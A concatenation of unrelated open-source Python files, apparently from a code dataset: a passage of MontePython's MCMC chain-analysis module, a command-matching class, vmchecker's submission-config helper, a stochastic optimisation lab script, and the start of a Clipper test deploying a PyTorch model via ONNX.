and (substring_err not in elem)
and all([x in elem for x in substrings])]
basename = os.path.basename(folder)
return folder, files, basename
def extract_array(line):
"""
Return the array on the RHS of the line
>>> extract_array("toto = ['one', 'two']\n")
['one', 'two']
>>> extract_array('toto = ["one", 0.2]\n')
['one', 0.2]
"""
# Recover RHS of the equal sign, and remove surrounding spaces
rhs = line.split('=')[-1].strip()
# Remove array signs
rhs = rhs.strip(']').lstrip('[')
# Recover each element of the list
sequence = [e.strip().strip('"').strip("'") for e in rhs.split(',')]
for index, elem in enumerate(sequence):
try:
sequence[index] = int(elem)
except ValueError:
try:
sequence[index] = float(elem)
except ValueError:
pass
return sequence
def extract_dict(line):
"""
Return the key and value of the dictionary element contained in line
>>> extract_dict("something['toto'] = [0, 1, 2, -2, 'cosmo']")
'toto', [0, 1, 2, -2, 'cosmo']
"""
# recovering the array
sequence = extract_array(line)
# Recovering only the LHS
lhs = line.split('=')[0].strip()
# Recovering the name from the LHS
name = lhs.split('[')[-1].strip(']')
name = name.strip('"').strip("'")
return name, sequence
def extract_parameter_names(info):
"""
Reading the log.param, store in the Information instance the names
"""
backup_names = []
plotted_parameters = []
boundaries = []
ref_names = []
tex_names = []
scales = []
with open(info.param_path, 'r') as param:
for line in param:
if line.find('#') == -1:
if line.find('data.experiments') != -1:
info.experiments = extract_array(line)
if line.find('data.parameters') != -1:
name, array = extract_dict(line)
original = name
# Rename the names according to the .extra file (optional)
if name in info.to_change.iterkeys():
name = info.to_change[name]
# If the name corresponds to a varying parameter (fourth
# entry in the initial array being non-zero, or a derived
# parameter (could be designed as fixed, it does not make
# any difference)), then continue the process of analyzing.
if array[3] != 0 or array[5] == 'derived':
# The real name is always kept, to have still the class
# names in the covmat
backup_names.append(original)
# With the list "to_plot", we can potentially restrict
# the variables plotted. If it is empty, though, simply
# all parameters will be plotted.
if info.to_plot == []:
plotted_parameters.append(name)
else:
if name in info.to_plot:
plotted_parameters.append(name)
# Append to the boundaries array
boundaries.append([
None if elem == 'None' or (isinstance(elem, int)
and elem == -1)
else elem for elem in array[1:3]])
ref_names.append(name)
# Take care of the scales
scale = array[4]
rescale = 1.
if name in info.new_scales.iterkeys():
scale = info.new_scales[name]
rescale = info.new_scales[name]/array[4]
scales.append(rescale)
# Given the scale, decide for the pretty tex name
number = 1./scale
tex_names.append(
io_mp.get_tex_name(name, number=number))
scales = np.diag(scales)
info.ref_names = ref_names
info.tex_names = tex_names
info.boundaries = boundaries
info.backup_names = backup_names
info.scales = scales
# Beware, the following two numbers are different. The first is the total
# number of parameters stored in the chain, whereas the second is for
# plotting purpose only.
info.number_parameters = len(ref_names)
info.plotted_parameters = plotted_parameters
def find_maximum_of_likelihood(info):
"""
Finding the global maximum of likelihood
min_minus_lkl will be appended with all the maximum likelihoods of files,
then will be replaced by its own maximum. This way, the global
maximum likelihood will be used as a reference, and not each chain's
maximum.
"""
min_minus_lkl = []
for chain_file in info.files:
# cheese will brutally contain everything (- log likelihood) in the
# file chain_file being scanned.
# This could potentially be faster with pandas, but is already quite
# fast
#
# This would read the chains including comment lines:
#cheese = (np.array([float(line.split()[1].strip())
# for line in open(chain_file, 'r')]))
#
# This reads the chains excluding comment lines:
with open(chain_file, 'r') as f:
cheese = (np.array([float(line.split()[1].strip())
for line in ifilterfalse(iscomment,f)]))
try:
min_minus_lkl.append(cheese[:].min())
except ValueError:
pass
# beware, it is the min because we are talking about
# '- log likelihood'
# Selecting only the true maximum.
try:
min_minus_lkl = min(min_minus_lkl)
except ValueError:
raise io_mp.AnalyzeError(
"No decently sized chain was found in the desired folder. " +
"Please wait to have more accepted point before trying " +
"to analyze it.")
info.min_minus_lkl = min_minus_lkl
def remove_bad_points(info):
"""
Create an array with all the points from the chains, after removing non-markovian, burn-in and fixed fraction
"""
# spam will brutally contain all the chains with sufficient number of
# points, after the burn-in was removed.
spam = list()
# Recover the longest file name, for pleasing display
max_name_length = max([len(e) for e in info.files])
# Total number of steps done:
steps = 0
accepted_steps = 0
# Open the log file
log = open(info.log_path, 'w')
for index, chain_file in enumerate(info.files):
# To improve presentation, and print only once the full path of the
# analyzed folder, we recover the length of the path name, and
# create an empty complementary string of this length
total_length = 18+max_name_length
empty_length = 18+len(os.path.dirname(chain_file))+1
basename = os.path.basename(chain_file)
if index == 0:
exec "print '--> Scanning file %-{0}s' % chain_file,".format(
max_name_length)
else:
exec "print '%{0}s%-{1}s' % ('', basename),".format(
empty_length, total_length-empty_length)
# cheese will brutally contain everything in the chain chain_file being
# scanned
#
# This would read the chains including comment lines:
#cheese = (np.array([[float(elem) for elem in line.split()]
# for line in open(chain_file, 'r')]))
#
# This reads the chains excluding comment lines:
with open(chain_file, 'r') as f:
cheese = (np.array([[float(elem) for elem in line.split()]
for line in ifilterfalse(iscomment,f)]))
# If the file contains a broken line with a different number of
# elements, the previous array generation might fail, and will not have
# the correct shape. Hence the following command will fail. To avoid
# that, the error is caught.
try:
local_min_minus_lkl = cheese[:, 1].min()
except IndexError:
raise io_mp.AnalyzeError(
"Error while scanning %s." % chain_file +
" This file most probably contains "
"an incomplete line, rendering the analysis impossible. "
"I think that the following line(s) is(are) wrong:\n %s" % (
'\n '.join(
['-> %s' % line for line in
open(chain_file, 'r') if
len(line.split()) != len(info.backup_names)+2])))
line_count = float(sum(1 for line in open(chain_file, 'r')))
# Logging the information obtained until now.
number_of_steps = cheese[:, 0].sum()
log.write("%s\t " % os.path.basename(chain_file))
log.write(" Number of steps:%d\t" % number_of_steps)
log.write(" Steps accepted:%d\t" % line_count)
log.write(" acc = %.2g\t" % (float(line_count)/number_of_steps))
log.write("min(-loglike) = %.2f\n" % local_min_minus_lkl)
steps += number_of_steps
accepted_steps += line_count
# check if analyze() is called directly by the user, or by the mcmc loop during an updating phase
try:
# command_line.update is defined when called by the mcmc loop
info.update
except:
# in case it was not defined (i.e. when analyze() is called directly by user), set it to False
info.update = 0
# Removing non-markovian part, burn-in, and fraction= (1 - keep-fraction)
start = 0
markovian=0
try:
# Read all comments in chains about times when proposal was updated
# The last of these comments gives the number of lines to be skipped in the files
if info.markovian and not info.update:
with open(chain_file, 'r') as f:
for line in ifilter(iscomment,f):
start = int(line.split()[2])
markovian = start
# Remove burn-in, defined as all points until the likelihood reaches min_minus_lkl+LOG_LKL_CUTOFF
while cheese[start, 1] > info.min_minus_lkl+LOG_LKL_CUTOFF:
start += 1
burnin = start-markovian
# Remove fixed fraction as requested by user (usually not useful if non-markovian is also removed)
if info.keep_fraction < 1:
start = start + int((1.-info.keep_fraction)*(line_count - start))
print ": Removed",
if info.markovian:
print "%d non-markovian points," % markovian,
print "%d points of burn-in," % burnin,
if info.keep_fraction < 1:
print "and first %.0f percent," % (100.*(1-info.keep_fraction)),
print "keep %d steps" % (line_count-start)
except IndexError:
print ': Removed everything: chain not converged'
# ham contains cheese without the burn-in, if there are any points
# left (more than 5)
if np.shape(cheese)[0] > start+5:
ham = np.copy(cheese[int(start)::])
# Deal with single file case
if len(info.files) == 1:
warnings.warn("Convergence computed for a single file")
bacon = np.copy(cheese[::3, :])
egg = np.copy(cheese[1::3, :])
sausage = np.copy(cheese[2::3, :])
spam.append(bacon)
spam.append(egg)
spam.append(sausage)
continue
# Adding resulting table to spam
spam.append(ham)
# Test the length of the list
if len(spam) == 0:
raise io_mp.AnalyzeError(
"No decently sized chain was found. " +
"Please wait a bit to analyze this folder")
# Applying now new rules for scales, if the name is contained in the
# referenced names
for name in info.new_scales.iterkeys():
try:
index = info.ref_names.index(name)
for i in xrange(len(spam)):
spam[i][:, index+2] *= 1./info.scales[index, index]
except ValueError:
# there is nothing to do if the name is not contained in ref_names
pass
info.steps = steps
info.accepted_steps = accepted_steps
return spam
def compute_mean(mean, spam, total):
"""
"""
for i in xrange(np.shape(mean)[1]):
for j in xrange(len(spam)):
submean = np.sum(spam[j][:, 0]*spam[j][:, i+2])
mean[j+1, i] = submean / total[j+1]
mean[0, i] += submean
mean[0, i] /= total[0]
def compute_variance(var, mean, spam, total):
"""
"""
for i in xrange(np.shape(var)[1]):
for j in xrange(len(spam)):
var[0, i] += np.sum(
spam[j][:, 0]*(spam[j][:, i+2]-mean[0, i])**2)
var[j+1, i] = np.sum(
spam[j][:, 0]*(spam[j][:, i+2]-mean[j+1, i])**2) / \
(total[j+1]-1)
var[0, i] /= (total[0]-1)
def compute_covariance_matrix(info):
"""
"""
covar = np.zeros((len(info.ref_names), len(info.ref_names)))
for i in xrange(len(info.ref_names)):
for j in xrange(i, len(info.ref_names)):
covar[i, j] = (
info.chain[:, 0]*(
(info.chain[:, i+2]-info.mean[i]) *
(info.chain[:, j+2]-info.mean[j]))).sum()
if i != j:
covar[j, i] = covar[i, j]
covar /= info.total
# Removing scale factors in order to store true parameter covariance
covar = np.dot(info.scales.T, np.dot(covar, info.scales))
return covar
def adjust_ticks(param, information_instances):
"""
"""
if len(information_instances) == 1:
return
# Recovering all x_range and ticks entries from the concerned information
# instances
x_ranges = []
ticks = []
for info in information_instances:
if not info.ignore_param:
x_ranges.append(info.x_range[info.native_index])
ticks.append(info.ticks[info.native_index])
# The new x_range and tick should min/max all the existing ones
new_x_range = np.array(
[min([e[0] for e in x_ranges]), max([e[1] for e in x_ranges])])
temp_ticks = np.array(
[min([e[0] for e in ticks]), max([e[-1] for e in ticks])])
new_ticks = np.linspace(temp_ticks[0],
temp_ticks[1],
info.ticknumber)
for info in information_instances:
if not info.ignore_param:
info.x_range[info.native_index] = new_x_range
info.ticks[info.native_index] = new_ticks
def store_contour_coordinates(info, name1, name2, contours):
"""docstring"""
file_name = os.path.join(
info.folder, 'plots', '{0}_2d_{1}-{2}.dat'.format(
info.basename, name1, name2))
with open(file_name, 'w') as plot_file:
plot_file.write(
'# contour for confidence level {0}\n'.format(
info.levels[1]))
for elem in contours.collections[0].get_paths():
points = elem.vertices
for k in range(np.shape(points)[0]):
plot_file.write("%.8g\t %.8g\n" % (
points[k, 0], points[k, 1]))
# stop to not include the inner contours
if k != 0:
if all(points[k] == points[0]):
plot_file.write("\n")
break
plot_file.write("\n\n")
plot_file.write(
'# contour for confidence level {0}\n'.format(
info.levels[0]))
for elem in contours.collections[1].get_paths():
points = elem.vertices
for k in range(np.shape(points)[0]):
plot_file.write("%.8g\t %.8g\n" % (
points[k, 0], points[k, 1]))
if k != 0:
if all(points[k] == points[0]):
plot_file.write("\n")
break
plot_file.write("\n\n")
def iscomment(s):
"""
Define what we call a comment in MontePython chain files
"""
return s.startswith('#')
class Information(object):
"""
Hold all information for analyzing runs
"""
# Counting the number of instances, to choose the color map
_ids = count(0)
# Flag checking the absence or presence of the interp1d function
has_interpolate_module = False
# Actual pairs of colors used by MP.
# For each pair, the first color is for the 95% contour,
# and the second for the 68% contour + the 1d probability.
# Note that, as with the other customisation options, you can specify new
# values for this in the extra plot_file.
MP_color = {
'Red':['#E37C80','#CE121F'],
'Blue':['#7A98F6','#1157EF'],
'Green':['#88B27A','#297C09'],
'Orange':['#F3BE82','#ED920F'],
'Grey':['#ABABAB','#737373'],
'Purple':['#B87294','#88004C']
}
# order used when several directories are analysed
MP_color_cycle = [
MP_color['Red'],
MP_color['Blue'],
MP_color['Green'],
MP_color['Orange'],
MP_color['Grey'],
MP_color['Purple']
]
# in the same order, list of transparency levels
alphas = [0.9, 0.9, 0.9, 0.9, 0.9, 0.9]
def __init__(self, command_line, other=None):
"""
The following initialization creates the three tables that can be
customized in an extra plot_file (see :mod:`parser_mp`).
Parameters
----------
command_line : Namespace
it contains the initialised command line arguments
"""
self.to_change = {}
"""
Dictionary whose keys are the old parameter names, and values are the
new ones. For instance :code:`{'beta_plus_lambda':'beta+lambda'}`
"""
self.to_plot = []
"""
Array of names of parameters to plot. If left empty, all will be
plotted.
.. warning::
If you changed a parameter name with :attr:`to_change`, you need to
give the new name to this array
"""
self.new_scales = {}
"""
Dictionary that redefines some scales. The keys will be the parameter
name, and the value its scale.
"""
# Assign a unique id to this instance
self.id = self._ids.next()
# Defining the sigma contours (1, 2 and 3-sigma)
self.levels = np.array([68.26, 95.4, 99.7])/100.
# Follows a bunch of initialisation to provide default members
self.ref_names, self.backup_names = [], []
self.scales, self.plotted_parameters = [], []
self.spam = []
# Store directly all information from the command_line object into this
# instance, except the protected members (begin and end with __)
for elem in dir(command_line):
if elem.find('__') == -1:
setattr(self, elem, getattr(command_line, elem))
# initialise the legend flags
self.plot_legend_1d = None
self.plot_legend_2d = None
# initialize the legend size to be the same as fontsize, but can be
# altered in the extra file
self.legendsize = self.fontsize
self.legendnames = []
# initialize the customisation script flags
self.custom1d = []
self.custom2d = []
# initialise the dictionary enforcing limits
self.force_limits = {}
# Read a potential file describing changes to be done for the parameter
# names, and number of parameters plotted (can be left empty, all will
# then be plotted), but also the style of the plot. Note that this
# overrides the command line options
if command_line.optional_plot_file:
plot_file_vars = {'info': self,'plt': plt}
execfile(command_line.optional_plot_file, plot_file_vars)
# check and store keep_fraction
if command_line.keep_fraction<=0 or command_line.keep_fraction>1:
raise io_mp.AnalyzeError("after --keep-fraction you should pass a float >0 and <=1")
self.keep_fraction = command_line.keep_fraction
def remap_parameters(self, spam):
"""
Perform substitutions of parameters for analyzing
.. note::
for arbitrary combinations of parameters, the prior will not
necessarily be flat.
"""
if hasattr(self, 'redefine'):
for key, value in self.redefine.iteritems():
# Check that the key was an original name
if key in self.backup_names:
print ' /|\ Transforming', key, 'into', value
# We recover the indices of the key
index_to_change = self.backup_names.index(key)+2
print('/_o_\ The new variable will be called ' +
self.ref_names[self.backup_names.index(key)])
# Recover all indices of all variables present in the
# remapping
variable_names = [elem for elem in self.backup_names if
value.find(elem) != -1]
indices = [self.backup_names.index(name)+2 for name in
variable_names]
# Now loop over all files in spam
for i in xrange(len(spam)):
# Assign variables to their values
for index, name in zip(indices, variable_names):
exec("%s = spam[i][:, %i]" % (name, index))
# Assign to the desired index the combination
exec("spam[i][:, %i] = %s" % (index_to_change, value))
def define_ticks(self):
"""
"""
self.max_values = self.chain[:, 2:].max(axis=0)
self.min_values = self.chain[:, 2:].min(axis=0)
self.span = (self.max_values-self.min_values)
# Define the place of ticks, given the number of ticks desired, stored
# in conf.ticknumber
self.ticks = np.array(
[np.linspace(self.min_values[i]+self.span[i]*0.1,
self.max_values[i]-self.span[i]*0.1,
self.ticknumber) for i in range(len(self.span))])
# Define the x range (ticks start not exactly at the range boundary to
# avoid display issues)
self.x_range = np.array((self.min_values, self.max_values)).T
# In case the exploration hit a boundary (as defined in the parameter
# file), at the level of precision defined by the number of bins, the
# ticks and x_range should be altered in order to display this
# meaningful number instead.
for i in range(np.shape(self.ticks)[0]):
x_range = self.x_range[i]
bounds = self.boundaries[i]
# Left boundary
if bounds[0] is not None:
if abs(x_range[0]-bounds[0]) < self.span[i]/self.bins:
self.ticks[i][0] = bounds[0]
self.x_range[i][0] = bounds[0]
# Right boundary
if bounds[-1] is not None:
if abs(x_range[-1]-bounds[-1]) < self.span[i]/self.bins:
self.ticks[i][-1] = bounds[-1]
self.x_range[i][-1] = bounds[-1]
def write_information_files(self):
# Store in info_names only the tex_names that were plotted, for this
# instance, and in indices the corresponding list of indices. It also
# removes the $ signs, for clarity
self.info_names = [
name for index, name in enumerate(self.tex_names) if
self.ref_names[index] in self.plotted_parameters]
self.indices = [self.tex_names.index(name) for name in self.info_names]
self.tex_names = [name for index, name in enumerate(self.tex_names) if
self.ref_names[index] in self.plotted_parameters]
self.info_names = [name.replace('$', '') for name in self.info_names]
# Define the bestfit array
self.bestfit = np.zeros(len(self.ref_names))
for i in xrange(len(self.ref_names)):
self.bestfit[i] = self.chain[self.sorted_indices[0], :][2+i]
# Write down to the .h_info file all necessary information
self.write_h_info()
self.write_v_info()
self.write_tex()
def write_h_info(self):
with open(self.h_info_path, 'w') as h_info:
h_info.write(' param names\t: ')
for name in self.info_names:
h_info.write("%-14s" % name)
write_h(h_info, self.indices, 'R-1 values', '% .6f', self.R)
write_h(h_info, self.indices, 'Best Fit ', '% .6e', self.bestfit)
write_h(h_info, self.indices, 'mean ', '% .6e', self.mean)
write_h(h_info, self.indices, 'sigma ', '% .6e',
(self.bounds[:, 0, 1]-self.bounds[:, 0, 0])/2.)
h_info.write('\n')
write_h(h_info, self.indices, '1-sigma - ', '% .6e',
self.bounds[:, 0, 0])
write_h(h_info, self.indices, '1-sigma + ', '% .6e',
self.bounds[:, 0, 1])
write_h(h_info, self.indices, '2-sigma - ', '% .6e',
self.bounds[:, 1, 0])
write_h(h_info, self.indices, '2-sigma + ', '% .6e',
self.bounds[:, 1, 1])
write_h(h_info, self.indices, '3-sigma - ', '% .6e',
self.bounds[:, 2, 0])
write_h(h_info, self.indices, '3-sigma + ', '% .6e',
self.bounds[:, 2, 1])
# bounds
h_info.write('\n')
write_h(h_info, self.indices, '1-sigma > ', '% .6e',
self.mean+self.bounds[:, 0, 0])
write_h(h_info, self.indices, '1-sigma < ', '% .6e',
self.mean+self.bounds[:, 0, 1])
write_h(h_info, self.indices, '2-sigma > ', '% .6e',
self.mean+self.bounds[:, 1, 0])
write_h(h_info, self.indices, '2-sigma < ', '% .6e',
self.mean+self.bounds[:, 1, 1])
write_h(h_info, self.indices, '3-sigma > ', '% .6e',
self.mean+self.bounds[:, 2, 0])
write_h(h_info, self.indices, '3-sigma < ', '% .6e',
self.mean+self.bounds[:, 2, 1])
def write_v_info(self):
"""Write vertical info file"""
with open(self.v_info_path, 'w') as v_info:
v_info.write('%-15s\t: %-11s' % ('param names', 'R-1'))
v_info.write(' '.join(['%-11s' % elem for elem in [
'Best fit', 'mean', 'sigma', '1-sigma -', '1-sigma +',
'2-sigma -', '2-sigma +', '1-sigma >', '1-sigma <',
'2-sigma >', '2-sigma <']]))
for index, name in zip(self.indices, self.info_names):
v_info.write('\n%-15s\t: % .4e' % (name, self.R[index]))
v_info.write(' '.join(['% .4e' % elem for elem in [
self.bestfit[index], self.mean[index],
(self.bounds[index, 0, 1]-self.bounds[index, 0, 0])/2.,
self.bounds[index, 0, 0], self.bounds[index, 0, 1],
self.bounds[index, 1, 0], self.bounds[index, 1, 1],
self.mean[index]+self.bounds[index, 0, 0],
self.mean[index]+self.bounds[index, 0, 1],
self.mean[index]+self.bounds[index, 1, 0],
self.mean[index]+self.bounds[index, 1, 1]]]))
def write_tex(self):
"""Write a tex table containing the main results """
with open(self.tex_path, 'w') as tex:
tex.write("\\begin{tabular}{|l|c|c|c|c|} \n \\hline \n")
tex.write("Param & best-fit & mean$\pm\sigma$ ")
tex.write("& 95\% lower & 95\% upper \\\\ \\hline \n")
for index, name in zip(self.indices, self.tex_names):
tex.write("%s &" % name)
tex.write("$%.4g$ & $%.4g_{%.2g}^{+%.2g}$ " % (
self.bestfit[index], self.mean[index],
self.bounds[index, 0, 0], self.bounds[index, 0, 1]))
tex.write("& $%.4g$ & $%.4g$ \\\\ \n" % (
self.mean[index]+self.bounds[index, 1, 0],
self.mean[index]+self.bounds[index, 1, 1]))
tex.write("\\hline \n \\end{tabular} \\\\ \n")
tex.write("$-\ln{\cal L}_\mathrm{min} =%.6g$, " % (
self.min_minus_lkl))
tex.write("minimum $\chi^2=%.4g$ \\\\ \n" % (
self.min_minus_lkl*2.))
| mit | 3,279,992,004,840,234,500 | 43.253259 | 153 | 0.52346 | false |
call-me-jimi/hq | hq/lib/hQCommand.py | 1 | 1329 | import re
class hQCommand( object ):
"""! @brief Command """
def __init__( self,
name,
regExp,
arguments = [],
permission = None,
fct = None,
help = "",
fullhelp = "" ):
self.name = name
self.arguments = arguments
self.re = re.compile(regExp)
self.permission = permission
self.fct = fct
self.help = help
self.fullhelp = fullhelp
def match( self, command_str ):
"""! @brief match regExp agains command_str """
return self.re.match( command_str )
def groups( self, command_str ):
"""! @brief return groups in regular expression """
match = self.re.match( command_str )
if match:
return match.groups()
else:
return None
def get_command_str( self ):
"""! @brief return command string """
s = self.name
for a in self.arguments:
s += ":<{A}>".format(A=a.upper())
return s
def get_fullhelp( self ):
"""! @brief return fullhelp or, if not given, help """
if self.fullhelp:
return self.fullhelp
else:
return self.help
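# Editor's usage sketch (hypothetical command, not part of the original file):
# a command is declared once with a regular expression and later matched
# against the raw command string received by the server.
if __name__ == '__main__':
    cmd = hQCommand(name='sleep',
                    regExp=r'^sleep:(\d+)',
                    arguments=['seconds'],
                    help='suspend execution for the given number of seconds')
    print(cmd.get_command_str()) # sleep:<SECONDS>
    print(cmd.groups('sleep:15')) # ('15',)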
| gpl-2.0 | 594,055,388,762,925,400 | 24.075472 | 62 | 0.470278 | false |
cojocar/vmchecker | vmchecker/submissions.py | 1 | 4960 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import with_statement
import ConfigParser
import os
import time
import datetime
import logging
from .config import DATE_FORMAT
from . import paths
_logger = logging.getLogger('vmchecker.submissions')
def get_time_struct_from_str(time_str):
"""Returns a time_struct object from the time_str string given"""
time_struct = time.strptime(time_str, DATE_FORMAT)
return time_struct
def get_datetime_from_time_struct(time_struct):
"""Returns a datetime object from time time_struct given"""
return datetime.datetime(*time_struct[:6])
class Submissions:
"""A class to manipulate submissions from a given repository"""
def __init__(self, vmpaths):
"""Create a Submissions class. vmpaths is a
vmchecker.paths.VmcheckerPaths object holding information
about one course configuration."""
self.vmpaths = vmpaths
def _get_submission_config_fname(self, assignment, user):
"""Returns the last submissions's configuration file name for
the given user for the given assignment.
If the config file cannot be found, returns None.
"""
sbroot = self.vmpaths.dir_cur_submission_root(assignment, user)
if not os.path.isdir(sbroot):
return None
config_file = paths.submission_config_file(sbroot)
if not os.path.isfile(config_file):
_logger.warn('%s found, but config (%s) is missing',
sbroot, config_file)
return None
return config_file
def _get_submission_config(self, assignment, user):
"""Returns a ConfigParser for the last submissions's
configuration file name for the given user for the given
assignment.
If the config file cannot be found, returns None.
"""
config_file = self._get_submission_config_fname(assignment, user)
if config_file == None:
return None
hrc = ConfigParser.RawConfigParser()
with open(config_file) as handler:
hrc.readfp(handler)
return hrc
def get_upload_time_str(self, assignment, user):
"""Returns a string representing the user's last submission date"""
hrc = self._get_submission_config(assignment, user)
if hrc == None:
return None
return hrc.get('Assignment', 'UploadTime')
def get_eval_queueing_time_str(self, assignment, user):
"""Returns a string representing the last time the submission
was queued for evaluation"""
hrc = self._get_submission_config(assignment, user)
if hrc == None:
return None
if not hrc.has_option('Assignment', 'EvaluationQueueingTime'):
return None
return hrc.get('Assignment', 'EvaluationQueueingTime')
def get_upload_time_struct(self, assignment, user):
"""Returns a time_struct object with the upload time of the
user's last submission"""
upload_time_str = self.get_upload_time_str(assignment, user)
return get_time_struct_from_str(upload_time_str)
def get_upload_time(self, assignment, user):
"""Returns a datetime object with the upload time of the
user's last submission"""
upload_time_struct = self.get_upload_time_struct(assignment, user)
return get_datetime_from_time_struct(upload_time_struct)
def get_eval_queueing_time_struct(self, assignment, user):
"""Returns a time_struct object with the upload time of the
last evaluation queueing for the user's last submission"""
time_str = self.get_eval_queueing_time_str(assignment, user)
return get_time_struct_from_str(time_str)
def get_eval_queueing_time(self, assignment, user):
"""Returns a datetime object with the upload time of the last
evaluation queueing for the user's last submission"""
time_struct = self.get_eval_queueing_time_struct(assignment, user)
return get_datetime_from_time_struct(time_struct)
def set_eval_parameters(self, assignment, user, archive, eval_time):
"""Appends the archive filename to an existing
submission-config (used for Large type assignments)"""
config_file = self._get_submission_config_fname(assignment, user)
if config_file == None:
return None
hrc = ConfigParser.RawConfigParser()
with open(config_file) as handler:
hrc.readfp(handler)
hrc.set('Assignment', 'ArchiveFilename', archive)
hrc.set('Assignment', 'EvaluationQueueingTime', eval_time)
with open(config_file, "w") as handler:
hrc.write(handler)
def submission_exists(self, assignment, user):
"""Returns true if a valid submission exists for the given
user and assignment"""
return (self._get_submission_config(assignment, user) != None)
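# Editor's sketch (hypothetical helper; relies on the DATE_FORMAT imported above):
# the two module-level functions convert a stored timestamp string into a
# datetime object in two steps.
def _example_parse_upload_time(time_str):
    time_struct = get_time_struct_from_str(time_str)
    return get_datetime_from_time_struct(time_struct)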
| mit | -8,193,271,641,474,638,000 | 32.513514 | 75 | 0.653831 | false |
budnyjj/bsuir_magistracy | disciplines/OTOS/lab_1/lab.py | 1 | 1813 | #!/usr/bin/env python
import functools
import math
import random
import numpy as np
import matplotlib.pyplot as plt
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# 1D model
def model(x):
a = 2.7; d = 0.1; y_0 = 2
sigma = 0.001
result = y_0 - 0.04 * (x - a) - d * (x - a)**2
return result + random.gauss(0, sigma)
def search_asymmetric(model, start_x, num_iter=100):
next_x = cur_x = start_x
vals_x = [cur_x]
for k in range(num_iter):
alpha = (k + 1) ** (-1/3)
factor = (k + 1) ** (-2/3)
next_x = cur_x + factor * (model(cur_x + alpha) - model(cur_x))
cur_x = next_x
vals_x.append(cur_x)
return vals_x
def search_symmetric(model, start_x, num_iter=100):
next_x = cur_x = start_x
vals_x = [cur_x]
for k in range(num_iter):
alpha = (k + 1) ** (-1/3)
factor = (k + 1) ** (-2/3)
next_x = cur_x + factor * (model(cur_x + alpha) - model(cur_x - alpha))
cur_x = next_x
vals_x.append(cur_x)
return vals_x
NUM_ITER = 1000
MIN_X = 1; MAX_X = 10; NUM_X = 100
VALS_X = np.linspace(MIN_X, MAX_X, NUM_X)
model_vec = np.vectorize(model)
plt.plot(VALS_X, model_vec(VALS_X),
color='r', linestyle=' ',
marker='.', markersize=5,
label='model')
search_asymmetric_x = search_asymmetric(model, MAX_X, NUM_ITER)
plt.plot(search_asymmetric_x, model_vec(search_asymmetric_x),
color='g', marker='x', markersize=5,
label='asymmetric')
search_symmetric_x = search_symmetric(model, MAX_X, NUM_ITER)
plt.plot(search_symmetric_x, model_vec(search_symmetric_x),
color='b', marker='x', markersize=5,
label='symmetric')
plt.xlabel('$ x $')
plt.ylabel('$ y $')
plt.grid(True)
# plt.legend(loc=2)
plt.savefig('plot.png', dpi=200)
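# Editor's note (added illustration): for the noiseless model
# y = y_0 - 0.04*(x - a) - d*(x - a)**2 the maximiser is x* = a - 0.04/(2*d),
# i.e. 2.7 - 0.2 = 2.5, which both stochastic searches should approach.
print('analytic optimum x* =', 2.7 - 0.04 / (2 * 0.1))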
| gpl-3.0 | 7,770,229,010,586,717,000 | 24.9 | 79 | 0.578047 | false |
ucbrise/clipper | integration-tests/deploy_pytorch_to_caffe2_with_onnx.py | 1 | 7042 | from __future__ import absolute_import, print_function
import os
import sys
import requests
import json
import numpy as np
import time
import logging
cur_dir = os.path.dirname(os.path.abspath(__file__))
import torch
import torch.utils.data as data
from torch import nn, optim
from torch.autograd import Variable
import torch.nn.functional as F
from test_utils import (create_docker_connection, BenchmarkException, headers,
log_clipper_state)
cur_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.abspath("%s/../clipper_admin" % cur_dir))
from clipper_admin.deployers.onnx import deploy_pytorch_model, create_pytorch_endpoint
logging.basicConfig(
format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
app_name = "caffe2-test"
model_name = "caffe2-model"
def normalize(x):
return x.astype(np.double) / 255.0
def objective(y, pos_label):
# prediction objective
if y == pos_label:
return 1
else:
return 0
def parsedata(train_path, pos_label):
trainData = np.genfromtxt(train_path, delimiter=',', dtype=int)
records = trainData[:, 1:]
labels = trainData[:, :1]
transformedlabels = [objective(ele, pos_label) for ele in labels]
return (records, transformedlabels)
def predict(model, inputs):
preds = model.run(np.array(inputs).astype(np.float32))
return [str(p) for p in preds[0]]
def deploy_and_test_model(clipper_conn,
model,
inputs,
version,
link_model=False,
predict_fn=predict):
deploy_pytorch_model(
clipper_conn,
model_name,
version,
"integers",
inputs,
predict_fn,
model,
onnx_backend="caffe2")
time.sleep(5)
if link_model:
clipper_conn.link_model_to_app(app_name, model_name)
time.sleep(5)
test_model(clipper_conn, app_name, version)
def test_model(clipper_conn, app, version):
time.sleep(25)
num_preds = 25
num_defaults = 0
addr = clipper_conn.get_query_addr()
for i in range(num_preds):
response = requests.post(
"http://%s/%s/predict" % (addr, app),
headers=headers,
data=json.dumps({
'input': get_test_point()
}))
result = response.json()
if response.status_code == requests.codes.ok and result["default"]:
num_defaults += 1
elif response.status_code != requests.codes.ok:
logger.error(result)
raise BenchmarkException(response.text)
if num_defaults > 0:
logger.error("Error: %d/%d predictions were default" % (num_defaults,
num_preds))
if num_defaults > num_preds / 2:
raise BenchmarkException("Error querying APP %s, MODEL %s:%d" %
(app, model_name, version))
# Define a simple NN model
class BasicNN(nn.Module):
def __init__(self):
super(BasicNN, self).__init__()
self.net = nn.Linear(28 * 28, 2)
def forward(self, x):
if isinstance(x, np.ndarray):
x = torch.from_numpy(x)
x = x.float()
if isinstance(x, type(torch.randn(1))):
x = Variable(x)
x = x.view(1, 1, 28, 28)
x = x / 255.0
batch_size = x.size(0)
x = x.view(batch_size, -1)
output = self.net(x.float())
return F.softmax(output)
def train(model):
model.train()
optimizer = optim.SGD(model.parameters(), lr=0.001)
for epoch in range(10):
for i, d in enumerate(train_loader, 1):
image, j = d
optimizer.zero_grad()
output = model(image)
loss = F.cross_entropy(output,
Variable(
torch.LongTensor([train_y[i - 1]])))
loss.backward()
optimizer.step()
return model
def get_test_point():
return [np.random.randint(255) for _ in range(784)]
# Define a dataloader to read data
class TrainingDataset(data.Dataset):
def __init__(self, data, label):
self.imgs = data
self.classes = label
def __getitem__(self, index):
img = self.imgs[index]
label = self.classes[index]
img = torch.Tensor(img)
return img, torch.Tensor(label)
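# Editor's sketch (hypothetical values; mirrors the usage in __main__ below):
# the dataset simply pairs normalized pixel rows with their binary labels.
def _training_dataset_example():
    records = np.random.randint(0, 255, size=(10, 784))
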